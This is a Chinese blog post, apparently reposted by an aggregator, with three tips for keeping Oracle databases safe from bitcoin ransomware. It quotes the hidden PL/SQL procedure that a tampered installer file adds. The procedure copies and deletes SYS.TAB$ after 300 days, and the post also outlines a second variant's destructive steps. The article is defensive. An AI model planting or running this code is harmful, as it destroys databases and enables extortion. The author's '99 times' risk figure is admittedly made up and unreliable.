数据安全:Oracle数据库避免比特币勒索的3个建议
Posted 数据工人
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了数据安全:Oracle数据库避免比特币勒索的3个建议相关的知识,希望对你有一定的参考价值。
比特币喋喋不休。
我一个朋友腰斩转售了。
但是来自比特币勒索的事件却喧嚣尘上。
许多开源数据库的比特币防范,主要靠关闭端口、注意密码和权限,而Oracle数据库却偏偏与众不同。
其实不太想写这个话题,因为我们已经将比特币病毒检查,加入到了Oracle数据库的巡检列表中了,定期检查都能发现潜在的隐藏着。
不过从月初突然又挂起一阵风,貌似比特币病毒又开始兴风作浪,连甲骨文官网都出来出指南了。
正在暗暗纳闷妖风之间,有两个朋友不约而同的谈起,XX数据库被比特币勒索了!
其实Oracle数据库要防范比特币病毒是如此简单。如果你不照做,那就可能要花大概小几万块人民币请各路大侠帮你解忧了。
大道至简,方法非常之简单:
建议1、永远从Oracle官网下载Oracle数据库安装软件,并检查MD5是否一致(18c开始换成更复杂的sha256sum)
不得不说,这一点,我之前完全没有想到。而正是因为近期这股妖风,几乎中病毒的所有用户,都是灾在这里。
https://www.oracle.com/technetwork/database/enterprise-edition/downloads/index.html
https://edelivery.oracle.com
如果这一串和你下载的软件检查的不一致,千万不要安装!
传闻,近期的这一波,就是某个集成商提供的Oracle安装介质被人做了手脚。
在prvtsupp.plb文件里多建了一个DBMS_SUPPORT_DBMONITORP存储过程,和一个DBMS_SUPPORT_DBMONITOR触发器,在你数据库运行满300天的时候,会把tab$直接给delete了。
PROCEDURE DBMS_SUPPORT_DBMONITORP IS
DATE1 INT :=10;
BEGIN
SELECT TO_CHAR(SYSDATE-CREATED ) INTO DATE1 FROM V$DATABASE;
IF (DATE1>=300) THEN
EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system as select * from sys.tab$';
DELETE SYS.TAB$;
COMMIT;
EXECUTE IMMEDIATE 'alter system checkpoint';
END IF;
END;
所以你数据库就不能用了,再启动open就报错ora-600 [16703],
建议2:不要下载盗版的PL/SQL软件或TOAD软件
我不是在呼吁你去买正版,反正你买不买也没人给我钱。
而是这种情况,是Oracle数据库被比特币勒索的最早来源。
这种方式中病毒的表现是类似这样的:
它主要生成这么几个对象:
DBMS_SUPPORT_INTERNAL
DBMS_SYSTEM_INTERNAL
DBMS_CORE_INTERNAL
1. 当数据库创建时间大于1200天之后,开始备份tab$表
2. 删除tab$中除掉owner#为0和38的记录(sys,xdb)
3. 通过SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION清理掉备份信息(v$controlfile_record_section)
5. 再抛出一个前台的和4类似的警告信息
建议3:不要在任何windows平台上安装Oracle数据库!
在我看来,windows就是一个普通的个人操作系统,从来不适合做一个企业级操作系统。
最重要的不是我的感觉/认为,而是,装在windows上,你的Oracle数据库被比特币病毒侵害的可能性要增加99倍的概率(当然,99是我乱说的,就是告诉你概率太高了)!
装在windows上的oracle,除了上面2种危险外,他直接把数据库软件安装目录里的文件也给你加密了。
这还不是最惨的,毕竟你换个机器装个软件就好了,就跟前面2种一样了。
最惨的是,某个开发商把一些配置文件也放在文件里了,通常这个文件是没有备份的,那问题就要严重得多了。这些数据你可以不要么?
想要数据安全,远离Oracle比特币病毒,严格遵循上述3个建议就好了。
当然,数据安全远不止比特币病毒这么一个点。
今天看到群里转发的银保监会的一则通告截图:
我也不知道具体是哪家银行。
作为一个技术布道者,讲究的是有一说一。在跟每个客户沟通的时候,我反复会强调,我是保健医生,不是江湖郎中。别指望你得了癌症,我一定能妙手回春。所以你需要在基础架构上做投入,在人员、流程上做投入,这样,我们能一起将你的风险降到最低。
这则通知,让我觉得最无趣的是最后一行“监管部门自2016年开始,已多次通报.....该行董事会、高管层履职不力.......”
如果真是这样,真的为这家银行的IT部门感到悲哀!你们就只能静静的背锅吧!
无独有偶,我上周某个晚上,也被领导加到某个故障处理群,没有备份,没有高可用........
对不起,我不是药神,也不是江湖郎中,我只是个保健医生!我能做的,就是点点滴滴,告诉你隐患在哪里,需要大家一起解决,而不是指望我能妙手回春!
比特币病毒也一样!
希望你的数据都平平安安!
更多阅读:
是错的
以上是关于数据安全:Oracle数据库避免比特币勒索的3个建议的主要内容,如果未能解决你的问题,请参考以下文章